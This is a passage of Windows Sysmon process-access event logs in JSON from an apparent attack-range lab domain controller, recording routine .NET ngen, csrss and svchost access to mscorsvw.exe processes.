{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6912,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.246\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010CCEF0D00}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.246","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010CCEF0D00}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6913,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.246\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010CCEF0D00}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.246","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010CCEF0D00}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6914,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.261\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010CCEF0D00}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.261","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010CCEF0D00}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6915,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.293\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00104DF30D00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.293","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00104DF30D00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6916,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00104DF30D00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00104DF30D00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6917,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00104DF30D00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00104DF30D00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6918,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.355\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00102EF70D00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.355","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00102EF70D00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6919,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.355\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00102EF70D00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 